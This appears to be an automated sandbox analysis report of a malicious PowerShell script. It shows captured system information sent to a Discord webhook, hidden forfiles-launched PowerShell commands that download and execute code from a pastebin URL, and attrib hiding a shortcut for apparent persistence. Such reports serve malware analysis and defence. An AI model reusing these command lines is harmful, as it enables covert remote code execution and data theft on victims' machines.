                                                                        2024-10-15 16:09:41 UTC297OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 6a 6f 6e 65 73 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4b 54 59 4e 39 54 35 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46
                                                                        Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** KTYN9T5\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - F
                                                                        2024-10-15 16:09:42 UTC1255INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 15 Oct 2024 16:09:42 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 45
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                        x-ratelimit-limit: 5
                                                                        x-ratelimit-remaining: 4
                                                                        x-ratelimit-reset: 1729008583
                                                                        x-ratelimit-reset-after: 1
                                                                        via: 1.1 google
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeeqasR%2FZ6glquLr4%2B9dp7W0sNckTtdzDwNJOHAmbirIFh272ZDh91349DAhFb9g5tQ5Ltr8ERpfeWRbMlUMh7rWyph9soS8ZXqkV%2FjyefiCPxSJh2ucL7rr7oNF"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        X-Content-Type-Options: nosniff
                                                                        Set-Cookie: __cfruid=ad6b0aeed1f819c30f3ac52fe64b31000bd6c0e4-1729008582; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                        Set-Cookie: _cfuvid=rHbUkHVL_Dtr1GPodamzi5DJ4MkV4S2_jFKvssroiBA-1729008582012-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d311334f8242e22-DFW
                                                                        2024-10-15 16:09:42 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                        Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:12:08:36
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm2.ps1"
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:12:08:36
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:12:08:39
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0w3v5ey\j0w3v5ey.cmdline"
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:2'759'232 bytes
                                                                        MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:12:08:39
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B3F.tmp" "c:\Users\user\AppData\Local\Temp\j0w3v5ey\CSCE8CC0B62BF5148F19D819A5B292CA929.TMP"
                                                                        Imagebase:0x7ff7c0750000
                                                                        File size:52'744 bytes
                                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:12:09:15
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                        Imagebase:0x7ff663c50000
                                                                        File size:52'224 bytes
                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:12:09:15
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:12:09:15
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:12:09:15
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:12:09:15
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\attrib.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                        Imagebase:0x7ff71a3e0000
                                                                        File size:23'040 bytes
                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:12
                                                                        Start time:12:09:23
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                        Imagebase:0x7ff663c50000
                                                                        File size:52'224 bytes
                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:12:09:23
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:12:09:23
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:15
                                                                        Start time:12:09:23
                                                                        Start date:15/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Executed Functions

                                                                          Function 00007FFD9B7EE7E6 Relevance: .5, Instructions: 472COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2184524457.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7a6a798b6e287092ad6d4707e2724f9fb9e422f524c0f6e7fb30e49c88b10a30
                                                                          • Instruction ID: 8b7deb88c7f93c7590618be2645ef27c4cab051f4af9e71a33d4b3a39ac49645
                                                                          • Opcode Fuzzy Hash: 7a6a798b6e287092ad6d4707e2724f9fb9e422f524c0f6e7fb30e49c88b10a30
                                                                          • Instruction Fuzzy Hash: 6DF1B530A09B8D8FEBA8DF28C8557E977E1FF54300F04466EE85DC72A5DB3499458B82
                                                                          Function 00007FFD9B7EF592 Relevance: .5, Instructions: 458COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2184524457.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b916473e82e7ace7ea403459a62aa33db9092e80061af5b603805259f348882
                                                                          • Instruction ID: fea8d79bc9cf801bd42c2fb713dd5632acc7f3bdf4cbde3188079516c3ba32bf
                                                                          • Opcode Fuzzy Hash: 7b916473e82e7ace7ea403459a62aa33db9092e80061af5b603805259f348882
                                                                          • Instruction Fuzzy Hash: 4AE1E430A09A8E8FEBA8DF28C8657E977D1EF54310F14466ED84DC76B5CF3499408B81
                                                                          Function 00007FFD9B8B7209 Relevance: .6, Instructions: 616COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2187842075.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9995f764b8349d2d9a82282b5325b266e891a428d9367af4e0f1c02943eb64f3
                                                                          • Instruction ID: 1adf44703670676bf30635d0af9b7f334174bdd880774fc9116c88a42ccf5aba
                                                                          • Opcode Fuzzy Hash: 9995f764b8349d2d9a82282b5325b266e891a428d9367af4e0f1c02943eb64f3
                                                                          • Instruction Fuzzy Hash: 59022926B0EB9E4FEBA5DB7C84649B47BE1EF59310B0901BAD05DC71A3D925ED01CB80
                                                                          Function 00007FFD9B8B41A9 Relevance: .5, Instructions: 475COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2187842075.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1ab056f7ec2b6eaa8bc5a4b48d7553bf27d37e70d42c341a0d88d2e9a14ab4e4
                                                                          • Instruction ID: d7fde36e3f53bb01814b3c103c0f8182b587edd0c5028cc3e22d7874fe89698a
                                                                          • Opcode Fuzzy Hash: 1ab056f7ec2b6eaa8bc5a4b48d7553bf27d37e70d42c341a0d88d2e9a14ab4e4
                                                                          • Instruction Fuzzy Hash: 2AE12A32B0EA9D4FDBA4DF688465AA47BE1EF58314B1D01BED04DC71A2DE25EC01CB81
                                                                          Function 00007FFD9B8B16C2 Relevance: .4, Instructions: 401COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2187842075.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4a5def3bd5a5c8dcb48bbe6a27123bbde412b0e1ea4769de75b34655f6df210f
                                                                          • Instruction ID: 25395eac5ab7866427561e400bfe25bb4028196fb540cde38afcd3332a421033
                                                                          • Opcode Fuzzy Hash: 4a5def3bd5a5c8dcb48bbe6a27123bbde412b0e1ea4769de75b34655f6df210f
                                                                          • Instruction Fuzzy Hash: 08C13722B1EBDD4FE7A6AB7858646A07FE1EF5A210B0901FBD04CCB1A3DD189D05C791
                                                                          Function 00007FFD9B7EF1A6 Relevance: .3, Instructions: 331COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2184524457.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fb885dbefe97bbfd4233dc552202b29050a94aeec16447d5da411650a1aa54de
                                                                          • Instruction ID: b69ccd394f1fc28060a36ea8741639f056f4091be15d22abd54d40730bb36b2c
                                                                          • Opcode Fuzzy Hash: fb885dbefe97bbfd4233dc552202b29050a94aeec16447d5da411650a1aa54de
                                                                          • Instruction Fuzzy Hash: 7EB1D77060DB8D8FEB68DF28C8557E93BD1EF55310F04426EE84DC76A5CA349945CB82
                                                                          Function 00007FFD9B8B73B1 Relevance: .3, Instructions: 321COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2187842075.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 18ce6f190769daaf430eafeb78496950455c5407f2ecd756097385cc4f50e3ca
                                                                          • Instruction ID: 1a51b0151eb324fb2a487caffcf713f076fdfd8bcb615e658ed5d8e813b185d7
                                                                          • Opcode Fuzzy Hash: 18ce6f190769daaf430eafeb78496950455c5407f2ecd756097385cc4f50e3ca
                                                                          • Instruction Fuzzy Hash: 78A1F735B0EB9E4FEBA4DB7884649747BE1EF5D304B0A01BAD05DC71A2DA25EC018B80
                                                                          Function 00007FFD9B7F1DCE Relevance: .2, Instructions: 215COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2184524457.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5391f22450b8ea5adf04bb650b2082c9c27ffc6be1c6b71187cb83eaee82af39
                                                                          • Instruction ID: a953ae84e690a04265ad95b8a460575f739de49d961f6b48364d8b5d926d560e
                                                                          • Opcode Fuzzy Hash: 5391f22450b8ea5adf04bb650b2082c9c27ffc6be1c6b71187cb83eaee82af39
                                                                          • Instruction Fuzzy Hash: 5051D731B1DA4D4FE768EF5888656B877E2FF98305F060279E44EC36E6CE24AC018785
                                                                          Function 00007FFD9B8B16E4 Relevance: .1, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2187842075.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1c6f061385c5da4514e2c2c543634c5d5558ebd9061ad8b2cf5521842ad3d08d
                                                                          • Instruction ID: c84046875d4cef7d719dd0c6a5c2f143dea534457884eb312e1b388ad8c81d15
                                                                          • Opcode Fuzzy Hash: 1c6f061385c5da4514e2c2c543634c5d5558ebd9061ad8b2cf5521842ad3d08d
                                                                          • Instruction Fuzzy Hash: 3C41E531A1EB894FDBA6AB7844A46A47FE1EF59240B0A00FBD45CCB1A3D918DD05C791
                                                                          Function 00007FFD9B7EECA4 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2184524457.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e877f896684ddc33aeec198fd5677dfc3922d913c5e47b7fb4aa44fc9a52e0df
                                                                          • Instruction ID: f1f34d0305003d790108d58633b40045b50437a7b2a90f0d25b6a26e14831eec
                                                                          • Opcode Fuzzy Hash: e877f896684ddc33aeec198fd5677dfc3922d913c5e47b7fb4aa44fc9a52e0df
                                                                          • Instruction Fuzzy Hash: 7331FE30A1968D8EFBB4DF54CC26BF932E5FF45319F410639D84D861F2CA386A45CA51
                                                                          Function 00007FFD9B7F28FA Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2184524457.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 10b1b1032ce27fb8ad5d941c6efe4715a0c95596e0e09441d8e024ea0197a7d8
                                                                          • Instruction ID: d991a128ca3c1a3e5faebc4d246cb19f578a36e52dcb6baf359244c80f9c5fb1
                                                                          • Opcode Fuzzy Hash: 10b1b1032ce27fb8ad5d941c6efe4715a0c95596e0e09441d8e024ea0197a7d8
                                                                          • Instruction Fuzzy Hash: 4A01F922B1E94C4FD794EBBC94656943BD1DF99210B5A42B7E00CCB2F7DD649C058392
                                                                          Function 00007FFD9B7E4835 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2184524457.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f95288c4a99142d14386fe92749649a4d709b0a47b1d07265438fae586fa589f
                                                                          • Instruction ID: a469a8a89e0f8261e4b16bdefe5d6760868dfaf1c703058fa7cf6c8bffcb8b15
                                                                          • Opcode Fuzzy Hash: f95288c4a99142d14386fe92749649a4d709b0a47b1d07265438fae586fa589f
                                                                          • Instruction Fuzzy Hash: 2B01A73020CB0C4FD748EF4CE051AA9B3E0FF85320F10056DE58AC36A1DA32E881CB41
                                                                          Function 00007FFD9B7EFE40 Relevance: .0, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2184524457.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f1c21630e441ed6b32bb784395068e77dbdcae738408745c49d9c439eb3a06a8
                                                                          • Instruction ID: 051c0192c9cf6d15ae1d8a3ac337207aeae5dc990f6004dda6b32ec871c2d376
                                                                          • Opcode Fuzzy Hash: f1c21630e441ed6b32bb784395068e77dbdcae738408745c49d9c439eb3a06a8
                                                                          • Instruction Fuzzy Hash: 7CF0B421B1D90D4FE7A4E6BC9418A6936D1DFC8310B5542B6B00DD72BADC649C068381
                                                                          Function 00007FFD9B7F450E Relevance: .0, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2184524457.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c27c392c3e46648336a400c15989b7d746bf9bbfa8a4bbb8cc979fbce8803ab8
                                                                          • Instruction ID: 8d226b39cb2a247aa429f7f8ee631e5c0025b37b6e1c61e0d4c6af825c2bcbb0
                                                                          • Opcode Fuzzy Hash: c27c392c3e46648336a400c15989b7d746bf9bbfa8a4bbb8cc979fbce8803ab8
                                                                          • Instruction Fuzzy Hash: 68B0124CB9DC2E09EA84315D70228FCB1409B80520F8304B0E42C852CBCD4E59820085

                                                                          Execution Graph

                                                                          Execution Coverage:3.3%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:3
                                                                          Total number of Limit Nodes:0
                                                                          execution_graph 8698 7ffd9b816c24 8699 7ffd9b816c2d LoadLibraryExW 8698->8699 8701 7ffd9b816cdd 8699->8701

                                                                          Executed Functions

                                                                          Function 00007FFD9B8D09F2 Relevance: 2.9, Strings: 2, Instructions: 430COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2402264153.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8d0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1?_L$6dg
                                                                          • API String ID: 0-2609699744
                                                                          • Opcode ID: 58dbb1d4002607b66e553cea0e18e5140d42efdb5edb4faf01ef004be5636779
                                                                          • Instruction ID: 9c547bb84e611a83d6904ee3deed922bed975cad8e9c962dab245457bf4c98a2
                                                                          • Opcode Fuzzy Hash: 58dbb1d4002607b66e553cea0e18e5140d42efdb5edb4faf01ef004be5636779
                                                                          • Instruction Fuzzy Hash: 71C17C21B1EBC94FDB66DB7884759657BE1EF9A21070A03FFC089CB1A3D918AC06C741
                                                                          Function 00007FFD9B8D0A2B Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
